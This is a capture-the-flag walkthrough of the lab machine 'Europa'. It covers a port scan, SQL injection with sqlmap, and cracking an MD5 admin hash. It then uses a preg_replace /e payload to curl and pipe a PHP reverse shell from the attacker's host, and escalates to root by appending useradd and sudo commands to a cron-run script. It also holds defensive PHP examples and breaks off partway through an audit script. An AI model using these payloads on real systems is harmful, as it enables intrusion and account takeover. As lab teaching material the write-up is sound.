Europa
Starting with a port scan.
root@n0w4n:~# nmap -vv -n -T4 -A -sC -p- 10.10.10.22
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-06 10:35 CEST
Nmap scan report for 10.10.10.22
Host is up, received reset ttl 63 (0.025s latency).
Scanned at 2018-07-06 10:35:34 CEST for 246s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh1/OK73CDKnJigk6uMUzDLSQhCHSpt9xL+SJrizWdCa7edGviU3NU/8So5xOOgzV1k8u3qHsudNnTSiH8Ek9d2c48B3xYHZn5+nPDv22fZ82LIRKd5qSLhthk91bL3uV+/CURpOZshvo0bVPS48UQaw5r7pWTE0goB+qyG2csY7hr3+9C7Sx4L/Vx7MOFuGAoy/EnpHG10f12ZJ6IVrX8mMEyZGb3Bh7crRN8tQ2RAvnJxyj+1ZeDo7Vr2F75r//dEL2iQ4S2Iuz8BocjQMREyIguIOSOJxjc/L52TpioRHnNK/aEArT02uakB4jRyd5LTSsijjitgUlAk/3H2cYd
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEqrLpdz7aDIUDy3bslqFlbGCrL4Q6tQmesbTP73F/Rv0GO6bb3zHETnZwVB5AKes/pQdRrbDlQCtR2v2WsTXsw=
|   256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDE2hVC32u7eNINSvsmSQkbMlUkJ7s0oiG/bxPhwZb/b
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Issuer: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-19T09:06:22
| Not valid after:  2027-04-17T09:06:22
| MD5:   35d5 1c04 7ae8 0f5c 35a0 bc49 53e5 d085
| SHA-1: ced9 8f01 1228 e35d 83d3 2634 b4c1 ed52 b917 3335
| -----BEGIN CERTIFICATE-----
| MIIFSDCCA7CgAwIBAgIJAPGhMP4FtiTCMA0GCSqGSIb3DQEBCwUAMIGUMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNV
| BAoMD0V1cm9wYUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9w
| YWNvcnAuaHRiMSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjAe
| Fw0xNzA0MTkwOTA2MjJaFw0yNzA0MTcwOTA2MjJaMIGUMQswCQYDVQQGEwJHUjEP
| MA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNVBAoMD0V1cm9w
| YUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9wYWNvcnAuaHRi
| MSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjCCAaIwDQYJKoZI
| hvcNAQEBBQADggGPADCCAYoCggGBAKzVzRrrM1MSWnf8zniIPKt0SXGDB2msYUm3
| rQJ3j31wPfn9xJOWeIpBCIbtXkRqO3XGrLjG/M0Slp3sa/lQ+1dk8aupaudrJvCm
| ITzLnGvtzrtyDlPkozH2wqM+tJx351gKhfrdF81TItS8oe3yskPW3MvEDbi5lPQM
| OVZk4dhFT4l94E1zrRoapU9fqNL66BdEzeEdS6XwntdARBrEyEoCp7nFIGMBKSIn
| JzxIh2VS98ybxkw58QcDEG9ClDH49nglkKmQfAevGKil8f1f9NYRwW3YOCvuzAA7
| Osg+pLEp4de6MEf408+AOhxl4CvgZKYWvmu7b+OSrFDN8cHFy/bQ2fvrjXNazjA0
| 9FIj4wivJ7JgJOCdXEianNZkvLzqPXGS/dVUrFF5fzyG0z5xOTvABZp86fNa3yNu
| zLb04h3j04SvfJ+T3CzkZDWVsFvOYdKsce600S/iaUoqE7XQH6QPB54ba5ailVtH
| npmV1uVqVxT7tXAs0ztIDpqzJ0XAnwIDAQABo4GaMIGXMB0GA1UdDgQWBBSdw09g
| /iRsaKt8R137PRpTAfuTgTA6BgNVHREEMzAxghJ3d3cuZXVyb3BhY29ycC5odGKC
| G2FkbWluLXBvcnRhbC5ldXJvcGFjb3JwLmh0YjAfBgNVHSMEGDAWgBSdw09g/iRs
| aKt8R137PRpTAfuTgTAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIFoDANBgkqhkiG
| 9w0BAQsFAAOCAYEAbv2ccFD/d2ovr3dkIqL1m2Qo3AgMObUaBczB37KDsB0w6lzf
| EOM/aBVth8LarblnVUJE0tk8Io7VBcTP9hF2nt3BuSM0mF6yMY3WRY+23JJpNxSO
| nOrZ1xLB7a6XTwSTWD0kg2bRbjSbiEWaUzY/RrqtCF1NThgyXo0wuMWPpPICmbd/
| 5ID8iOH+rmR3nR4fP80J38SUmvrsXAmifbsbKaKHspNMclQ2Idfiyv53xAoFrJzV
| cuxHKyBxYn8A5DPRIhbesLF2NAy0d4aziNeVgGQnSA9cV9RhN454nuzwqKb33BlF
| L8cpG59w3xR8RuyTyZql4uBPZtogzh0pc0PyxX2E2O5nbn85aqYDkVW7aUkeiU69
| LAiIp8s6Z+Rhe2rN4RAudtMcWaMTwjBOb1k1UrJ+0T7Av3O5nJk5kd/Ee5LUD2jX
| wE9Q72WLg1HP/PSSJPsNASSAW4OWSYG1CqLIhfRk5wJtfi6oR9VO+CpajWvqB0Ej
| PTXIrDgdEK1VKan9
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   http/1.1
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.70%E=4%D=7/6%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5B3F2ACC%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10A%TI=Z%II=I%TS=8)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 1.581 days (since Wed Jul  4 20:42:20 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   24.76 ms 10.10.14.1
2   24.83 ms 10.10.10.22

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.88 seconds
           Raw packets sent: 131237 (5.778MB) | Rcvd: 188 (13.883KB)
So there is an SSH server running and a web server on ports 80 and 443. A certificate is available, and when looking at it I noticed DNS information in the Subject Alternative Name field.
Because there is only one IP address but two hostnames, it looks like some virtual host routing is in place (explanation).
Grabbing the HTTP header with Burp.
GET / HTTP/1.1
Host: 10.10.10.22
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT
If-None-Match: "30a7-5554012ba5aba-gzip"
Cache-Control: max-age=0
And changing the host.
GET / HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT
If-None-Match: "30a7-5554012ba5aba-gzip"
Cache-Control: max-age=0
And as a response I get a redirect to a login page.
HTTP/1.1 302 Found
Date: Fri, 06 Jul 2018 10:11:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: https://admin-portal.europacorp.htb/login.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
When I follow the redirect, Burp doesn't know where to go because it cannot resolve the hostname. Adding an entry to /etc/hosts fixes that.
10.10.10.22 admin-portal.europacorp.htb
Now I can access the admin portal.
When checking the page source there is a CSS file which tells me the site is built with the Bootstrap framework.
Let's try to log in... nope.
I capture the HTTP request with Burp and feed it to sqlmap. sqlmap tries port 80 and doesn't find the URL, so I add ':443' to the Host header in the request file. Another option is the --force-ssl flag of sqlmap.
root@n0w4n:~/opt/htb/europa# sqlmap -r header.txt --risk=3 --level=5 --dbs
After a while I get some result.
Database: admin
Table: users
[2 entries]
+----+----------------------+--------+---------------+----------------------------------+
| id | email                | active | username      | password                         |
+----+----------------------+--------+---------------+----------------------------------+
| 1  | admin@europacorp.htb | 1      | administrator | 2b6d315337f18617ba18922c0b9597ff |
| 2  | john@europacorp.htb  | 1      | john          | 2b6d315337f18617ba18922c0b9597ff |
+----+----------------------+--------+---------------+----------------------------------+
After a quick search on some MD5 crackers online I get the result.
2b6d315337f18617ba18922c0b9597ff MD5 : SuperSecretPassword!
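Two things made this step easy: the login form passed the e-mail field into SQL, and the database stored unsalted MD5 hashes, so one lookup gave the administrator password. As an added example (not the admin portal's own code; table and column names follow the sqlmap dump above, the account and passphrase are constructed, and an in-memory SQLite database is used so it runs stand-alone), here is a login check without either weakness, assuming PHP 7.1 or later with PDO and pdo_sqlite:

```php
<?php
// Added example, not the Europa admin portal's own code. The query is
// parameterised, so the e-mail field cannot change the SQL, and passwords
// are stored with password_hash() (bcrypt, per-user salt) instead of
// unsalted MD5. The seeded account and passphrase are made up.

function setupDemoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE,
               username TEXT, password TEXT, active INTEGER)');
    $ins = $db->prepare('INSERT INTO users (email, username, password, active)
                         VALUES (?, ?, ?, 1)');
    $ins->execute(['admin@example.test', 'administrator',
                   password_hash('example-only-passphrase', PASSWORD_DEFAULT)]);
    return $db;
}

// Returns the user record on success, null on failure.
function authenticate(PDO $db, string $email, string $password): ?array {
    // Placeholder: the driver sends the value separately from the SQL text,
    // so quotes or comment sequences in $email are just characters.
    $sel = $db->prepare('SELECT id, username, password FROM users
                         WHERE email = ? AND active = 1');
    $sel->execute([$email]);
    $row = $sel->fetch(PDO::FETCH_ASSOC);

    // Always run password_verify(), against a dummy hash when the account is
    // unknown, so response time does not reveal which e-mails exist.
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash('dummy', PASSWORD_DEFAULT);
    }
    $hash = $row !== false ? $row['password'] : $dummy;
    if (!password_verify($password, $hash) || $row === false) {
        return null;
    }
    // Re-hash transparently when the default algorithm or cost changes.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $db->prepare('UPDATE users SET password = ? WHERE id = ?')
           ->execute([password_hash($password, PASSWORD_DEFAULT), $row['id']]);
    }
    return ['id' => $row['id'], 'username' => $row['username']];
}

$db = setupDemoDb();
var_dump(authenticate($db, 'admin@example.test', 'example-only-passphrase') !== null);
var_dump(authenticate($db, 'admin@example.test', 'wrong-passphrase') !== null);
var_dump(authenticate($db, 'nobody@example.test', 'anything') !== null);
```

Run it with `php login.php`; the first check succeeds and the other two fail. The point of the dummy-hash branch is that an unknown e-mail costs the same bcrypt work as a wrong password, so the two failures are indistinguishable by timing.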
Almost everything is inactive, except for the ‘Tools’ section.
Within the Tools section there is an OpenVPN Config Generator with an input field.
"openvpn": {
    "vtun0": {
        "local-address": {
            "10.10.10.1": "''"
        },
        "local-port": "1337",
        "mode": "site-to-site",
        "openvpn-option": [
            "--comp-lzo",
            "--float",
            "--ping 10",
            "--ping-restart 20",
            "--ping-timer-rem",
            "--persist-tun",
            "--persist-key",
            "--user nobody",
            "--group nogroup"
        ],
        "remote-address": "ip_address",
        "remote-port": "1337",
        "shared-secret-key-file": "/config/auth/secret"
    },
    "protocols": {
        "static": {
            "interface-route": {
                "ip_address/24": {
                    "next-hop-interface": {
                        "vtun0": "''"
                    }
                }
            }
        }
    }
}
What does it do?
"openvpn": {
    "vtun0": {
        "local-address": {
            "10.10.10.1": "''"
        },
        "local-port": "1337",
        "mode": "site-to-site",
        "openvpn-option": [
            "--comp-lzo",
            "--float",
            "--ping 10",
            "--ping-restart 20",
            "--ping-timer-rem",
            "--persist-tun",
            "--persist-key",
            "--user nobody",
            "--group nogroup"
        ],
        "remote-address": "10.10.14.3",
        "remote-port": "1337",
        "shared-secret-key-file": "/config/auth/secret"
    },
    "protocols": {
        "static": {
            "interface-route": {
                "10.10.14.3/24": {
                    "next-hop-interface": {
                        "vtun0": "''"
                    }
                }
            }
        }
    }
}
It replaces 'ip_address' with the value I gave (in this case 10.10.14.3). Can I misuse this? Let's run it through Burp again.
POST /tools.php HTTP/1.1
Host: admin-portal.europacorp.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin-portal.europacorp.htb/tools.php
Cookie: PHPSESSID=53pne4hhcormh5obflmmonjvb4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1688

pattern=%2Fip_address%2F&ipaddress=10.10.14.3&text=%22openvpn%22%3A+%7B%0D%0A++++++++%22vtun0%22%3A+%7B%0D%0A++++++++++++++++%22local-address%22%3A+%7B%0D%0A++++++++++++++++++++++++%2210.10.10.1%22%3A+%22%27%27%22%0D%0A++++++++++++++++%7D%2C%0D%0A++++++++++++++++%22local-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22mode%22%3A+%22site-to-site%22%2C%0D%0A++++++++++++++++%22openvpn-option%22%3A+%5B%0D%0A++++++++++++++++++++++++%22--comp-lzo%22%2C%0D%0A++++++++++++++++++++++++%22--float%22%2C%0D%0A++++++++++++++++++++++++%22--ping+10%22%2C%0D%0A++++++++++++++++++++++++%22--ping-restart+20%22%2C%0D%0A++++++++++++++++++++++++%22--ping-timer-rem%22%2C%0D%0A++++++++++++++++++++++++%22--persist-tun%22%2C%0D%0A++++++++++++++++++++++++%22--persist-key%22%2C%0D%0A++++++++++++++++++++++++%22--user+nobody%22%2C%0D%0A++++++++++++++++++++++++%22--group+nogroup%22%0D%0A++++++++++++++++%5D%2C%0D%0A++++++++++++++++%22remote-address%22%3A+%22ip_address%22%2C%0D%0A++++++++++++++++%22remote-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22shared-secret-key-file%22%3A+%22%2Fconfig%2Fauth%2Fsecret%22%0D%0A++++++++%7D%2C%0D%0A++++++++%22protocols%22%3A+%7B%0D%0A++++++++++++++++%22static%22%3A+%7B%0D%0A++++++++++++++++++++++++%22interface-route%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++%22ip_address%2F24%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++%22next-hop-interface%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++++++++++%22vtun0%22%3A+%22%27%27%22%0D%0A++++++++++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++%7D%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%7D%0D%0A++++++++++++++++++++++++++++++++
Mostly URL encoded. Decoding in Burp is easy.
pattern=/ip_address/&ipaddress=10.10.14.3&text="openvpn": {
    "vtun0": {
        "local-address": {
            "10.10.10.1": "''"
        },
        "local-port": "1337",
        "mode": "site-to-site",
        "openvpn-option": [
            "--comp-lzo",
            "--float",
            "--ping 10",
            "--ping-restart 20",
            "--ping-timer-rem",
            "--persist-tun",
            "--persist-key",
            "--user nobody",
            "--group nogroup"
        ],
        "remote-address": "ip_address",
        "remote-port": "1337",
        "shared-secret-key-file": "/config/auth/secret"
    },
    "protocols": {
        "static": {
            "interface-route": {
                "ip_address/24": {
                    "next-hop-interface": {
                        "vtun0": "''"
                    }
                }
            }
        }
    }
}
So the PHP function replaces one value with another value supplied by the user. A Google search showed this is the preg_replace function (link).
This function searches the subject for matches of the pattern and replaces them with the given replacement. PCRE offers a number of pattern modifiers, and one stands out from the rest: the /e modifier is deprecated because of security issues (link). The preferred function nowadays is preg_replace_callback().
But why is this modifier so bad? This site has an excellent explanation of why preg_replace with /e is such a bad idea. In a nutshell, if this modifier is set, preg_replace() does the normal substitution of backreferences in the replacement string, evaluates the result as PHP code, and uses what that returns to replace the matched text. Single quotes, double quotes, backslashes (\) and NULL characters in substituted backreferences are escaped with backslashes. Because /e evaluates arbitrary PHP code, it is easily exploited when user input is not carefully validated or sanitized. Here the user controls not just the replacement but the pattern itself, modifiers included, so nothing stops a request from adding /e.
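To make the difference concrete, here is an added example (not the code of tools.php on the box; function names and form fields are assumed for illustration) that puts the vulnerable shape described above next to a hardened version: a fixed pattern, an IP-validated replacement, and preg_replace_callback(), which never evaluates strings as code. It assumes PHP 7.1 or later:

```php
<?php
// Added example, not the real tools.php. Shows the shape of the bug next to
// a hardened replacement; names are assumed for illustration.

// Vulnerable shape: pattern, replacement and subject all come straight from
// the request, so the client also chooses the pattern's modifiers. On PHP 5.x
// a pattern ending in /e made preg_replace() evaluate the replacement as PHP.
// PHP 7 and later refuse /e with a warning and return NULL, but a
// caller-controlled regex is still a bug: arbitrary patterns, catastrophic
// backtracking, and no validation of the value that ends up in the config.
function renderConfigVulnerable(array $post) {
    return preg_replace($post['pattern'], $post['ipaddress'], $post['text']);
}

// Hardened: the pattern is fixed in code, so no user-chosen modifier reaches
// PCRE; the replacement must be an IPv4 literal; the substitution is done by
// a callback, which is plain PHP, not eval'd text.
const CONFIG_TEMPLATE =
    '"remote-address": "ip_address", "interface-route": { "ip_address/24": {} }';

function renderConfig(string $ip, string $template = CONFIG_TEMPLATE): string {
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        throw new InvalidArgumentException('remote address must be an IPv4 literal');
    }
    return preg_replace_callback(
        '/\bip_address\b/',
        function (array $match) use ($ip): string { return $ip; },
        $template
    );
}

echo renderConfig('10.10.14.3'), "\n";
try {
    renderConfig('10.10.14.3; not an address');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Run it with `php tools-example.php`. Since the placeholder is a fixed token, str_replace() would do the job just as well; the callback form is shown because it is the documented successor to /e when a computed replacement really is needed. The validation step matters independently of the regex: the value is written into an OpenVPN configuration, so it should only ever be an address.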
Let’s see if commands will be executed.
Looks like the commands are executed just nicely.
Now let's get a shell. For this I use one of my favorites: the pentestmonkey PHP reverse shell. The script is altered to point back to my IP and port.
Setting up listener.
root@n0w4n:~/opt/htb/europa# nc -lvnp 31337
listening on [any] 31337 ...
Entering this in the same Repeater window of Burp.
pattern=/ip_address/e&ipaddress=system('curl http://10.10.14.3:8000/shell.php | php;')&text="openvpn": {
Response on my machine.
root@n0w4n:~/opt/htb/europa# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.22 - - [06/Jul/2018 14:50:26] "GET /shell.php HTTP/1.1" 200 -
And I have a working shell.
root@n0w4n:~/opt/htb/europa# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.22] 41852
Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 15:53:06 up 7 min,  0 users,  load average: 0.00, 0.06, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Because this is a temporary shell I wanted to upload a more permanent one which I could execute from the /var/www/admin folder, but it was write restricted.
After leaving the /admin/ folder I noticed a /var/www/cmd and a /var/www/cronjobs folder. /cmd was empty, but inside /cronjobs there was a file named clearlogs.
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
For the enumeration part I uploaded the LinEnum script and ran it from /tmp.
[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)

...

[-] Contents of /etc/passwd:
john:x:1000:1000:John Makris,,,:/home/john:/bin/bash

...

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root root 4.0K Apr 18  2017 .
drwxr-xr-x 23 root root 4.0K Jun 23  2017 ..
drwxr-xr-x  4 john john 4.0K Jun 23  2017 john

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /var/www/cronjobs/clearlogs
Here is the cronjob from earlier. Looks like it runs every minute.
Earlier in the LinEnum output it looked like the /home/john folder is readable by anyone, so let's have a look for a flag.
$ cd /home/john
$ ls -lah
total 40K
drwxr-xr-x 4 john john 4.0K Jun 23  2017 .
drwxr-xr-x 3 root root 4.0K Apr 18  2017 ..
-rw------- 1 john john    1 Dec 24  2017 .bash_history
-rw-r--r-- 1 john john  220 Apr 18  2017 .bash_logout
-rw-r--r-- 1 john john 3.7K Apr 18  2017 .bashrc
drwx------ 2 john john 4.0K Apr 18  2017 .cache
drwxrwxr-x 2 john john 4.0K Apr 18  2017 .nano
-rw-r--r-- 1 john john  655 Apr 18  2017 .profile
-rw------- 1 root root 1.0K Apr 19  2017 .rnd
-rw-r--r-- 1 john john    0 Apr 18  2017 .sudo_as_admin_successful
-r--r--r-- 1 root john   33 Jun 23  2017 user.txt
$ cat user.txt
2f8d40cc05295154a9c3452c19ddc221
Now for the elevated rights and the final flag.
$ cd /var/www/cmd
$ ls -lah
total 8.0K
drwxrwxr-x 2 root www-data 4.0K May 12  2017 .
drwxr-xr-x 6 root root     4.0K May 12  2017 ..
$ echo -ne "#!/bin/bash\ntouch /tmp/test.txt" > logcleared.sh
$ ls -lah
total 12K
drwxrwxr-x 2 root     www-data 4.0K Jul  6 16:58 .
drwxr-xr-x 6 root     root     4.0K May 12  2017 ..
-rw-rw-rw- 1 www-data www-data   36 Jul  6 16:58 logcleared.sh
$ chmod +x logcleared.sh
$ ls -lah /tmp
total 36K
drwxrwxrwt  9 root root 4.0K Jul  6 16:59 .
drwxr-xr-x 23 root root 4.0K Jun 23  2017 ..
drwxrwxrwt  2 root root 4.0K Jul  6 16:52 .ICE-unix
drwxrwxrwt  2 root root 4.0K Jul  6 16:52 .Test-unix
drwxrwxrwt  2 root root 4.0K Jul  6 16:52 .X11-unix
drwxrwxrwt  2 root root 4.0K Jul  6 16:52 .XIM-unix
drwxrwxrwt  2 root root 4.0K Jul  6 16:52 .font-unix
drwx------  3 root root 4.0K Jul  6 16:52 systemd-private-b62d0155be1d4db89f375b92afe80b91-systemd-timesyncd.service-LsnZ9N
-rw-r--r--  1 root root    0 Jul  6 16:59 test.txt
drwx------  2 root root 4.0K Jul  6 16:52 vmware-root
Looks like that worked. Now for some better content.
$ echo -ne "\nuseradd -m n0w4n" >> logcleared.sh
$ echo "echo 'n0w4n:password1' | chpasswd" >> logcleared.sh
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
john:x:1000:1000:John Makris,,,:/home/john:/bin/bash
n0w4n:x:1001:1001::/home/n0w4n:
$ echo "usermod -aG sudo n0w4n" >> logcleared.sh
That went well.
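The root cause here is not the cron job itself but what it reaches: a root job runs a PHP script that exec()s /var/www/cmd/logcleared.sh, that file does not exist, and its directory is group-writable by www-data. The following is an added example, not part of the box or this write-up, of a check a defender can run over a privileged job's target: it walks every directory above the path and the path itself and reports anything a non-root principal can write or create. The `$europaModel` map is a constructed (uid, gid, mode) model of the listings above (0 = root, 33 = www-data; /var/www/cronjobs is assumed to be root 755) so the script runs offline; with no model it stats the live filesystem. Assumes PHP 7.1 or later:

```php
#!/usr/bin/php
<?php
// Added example, not the box's code: audit what a root cron job executes.

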